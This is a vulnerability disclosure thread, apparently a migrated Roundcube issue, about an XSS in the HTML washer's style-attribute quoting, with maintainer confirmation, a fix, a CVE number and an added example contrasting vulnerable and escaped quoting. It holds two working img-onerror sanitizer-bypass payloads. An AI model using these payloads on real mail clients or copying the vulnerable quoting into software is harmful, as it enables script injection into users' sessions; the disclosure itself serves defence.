
XSS Vulnerability on the Body of the Email #4739

Closed
rcubetrac opened this Issue Jan 12, 2015 · 9 comments


Reported by phithon on 12 Jan 2015 17:03 UTC as Trac ticket #1490227

Hi, guys
I've found that if someone sends you an email that includes this HTML code:

<img src="data:xxx1" style=aaa:'"/onerror=alert(1)//' >

The JavaScript code "alert(1)" will be executed.
The vulnerability occurred in "/program/lib/Roundcube/rcube_washtml.php":

```php
else if ($key == 'style' && ($style = $this->wash_style($value))) {
    // Pick the quote character that does not occur in the washed style value.
    // A value containing both kinds of quote defeats this choice.
    $quot = strpos($style, '"') !== false ? "'" : '"';
    $t .= ' style=' . $quot . $style . $quot;
}
```

When both a single quote and a double quote are in $style, the style attribute will be closed, and all the content after the quote will get out of the attribute.
<img src="data:xxx1" style=aaa:'"/onerror=alert(1)' > becomes <img src="data:xxx1" style='aaa: '"/onerror=alert(1)'' />
btw, it executes only in Chrome.
[[Image(http://www.leavesongs.com/content/plugins/kl_album/upload/201501/a6469005d34f6cf677510da16ab733ee201501130059391461631074.jpg)]]

Keywords: XSS
Migrated-From: http://trac.roundcube.net/ticket/1490227
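The quoting logic quoted in the report can be contrasted with a variant that escapes the attribute value instead of choosing a delimiter. The following is an added example written for this page; it is not Roundcube's code, does not claim to reproduce the fix in 786aa07, and the function names (`style_attr_vulnerable`, `style_attr_hardened`, `attr_is_well_formed`) and the sample values are constructed for illustration.

```php
<?php
// Added example, not Roundcube code. Function names are hypothetical.

// Mirrors the pattern from the report: use whichever quote character the value
// does NOT contain. If the value contains both ' and ", the chosen delimiter can
// be closed from inside the value and later text lands outside the attribute.
function style_attr_vulnerable(string $style): string
{
    $quot = strpos($style, '"') !== false ? "'" : '"';
    return ' style=' . $quot . $style . $quot;
}

// Hardened variant (assumed approach, not necessarily the project's fix): always
// use double quotes and HTML-encode the value, so ' and " become entities and can
// no longer terminate the attribute. Browsers decode the entities before handing
// the value to the CSS parser, so legitimate quoted CSS still works.
function style_attr_hardened(string $style): string
{
    $escaped = htmlspecialchars($style, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return ' style="' . $escaped . '"';
}

// Check suitable for a unit test: the emitted attribute must open and close with
// the same delimiter and contain no unescaped copy of that delimiter in between.
function attr_is_well_formed(string $attr): bool
{
    if (!preg_match('/^ style=(["\'])(.*)\1$/s', $attr, $m)) {
        return false;
    }
    return strpos($m[2], $m[1]) === false;
}

// Constructed inputs: plain value, value with one quote kind, value with both.
$samples = [
    'color:red',
    "font-family:'Arial'",
    "aaa:'\"/x='y",   // both quote kinds: no safe delimiter exists for the vulnerable builder
];

foreach ($samples as $s) {
    $v = style_attr_vulnerable($s);
    $h = style_attr_hardened($s);
    printf("input: %s\n  vulnerable: %s  -> well-formed: %s\n  hardened:   %s  -> well-formed: %s\n",
        $s,
        $v, attr_is_well_formed($v) ? 'yes' : 'NO',
        $h, attr_is_well_formed($h) ? 'yes' : 'NO');
}
```

Run with `php example.php`: the first two samples pass both builders, while the third is reported as not well-formed by the vulnerable builder (the inner `'` terminates the attribute) and as well-formed by the hardened one, whose output contains `&#039;` and `&quot;` instead of raw quotes. The check function is the piece worth keeping in a sanitizer's test suite, since it fails whenever any future change lets a delimiter character reach the attribute body unescaped.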

Comment by phithon on 12 Jan 2015 17:35 UTC

you can contact me.
root@leavesongs.com

Comment by @alecpl on 12 Jan 2015 17:57 UTC

I'm unable to reproduce, could you attach sample message?

Milestone changed by @alecpl on 12 Jan 2015 17:57 UTC

later => 1.1.0

Comment by @alecpl on 12 Jan 2015 19:55 UTC

Ah sorry, I didn't notice it is for Chrome only. Confirmed.

Comment by phithon on 13 Jan 2015 02:27 UTC

Replying to alec:

Ah sorry, I didn't notice it is for Chrome only. Confirmed.

This PoC works in most browsers except Firefox:

<img src="data:xxx1" style=aaa:'title="/"onerror=alert(1)//' >

Comment by @alecpl on 13 Jan 2015 08:42 UTC

Fixed in 786aa07.

Status changed by @alecpl on 13 Jan 2015 08:42 UTC

new => closed

@rcubetrac rcubetrac closed this Jan 13, 2015

Comment by agustin on 25 Jan 2015 18:22 UTC

Does this problem affect the version 0.9.5? Or is it only for versions 1.0 and later?

Comment by henrisalo on 29 Mar 2015 20:21 UTC

Please use CVE-2015-1433 for this issue, thanks.

@rcubetrac rcubetrac added this to the 1.1.0 milestone Mar 20, 2016
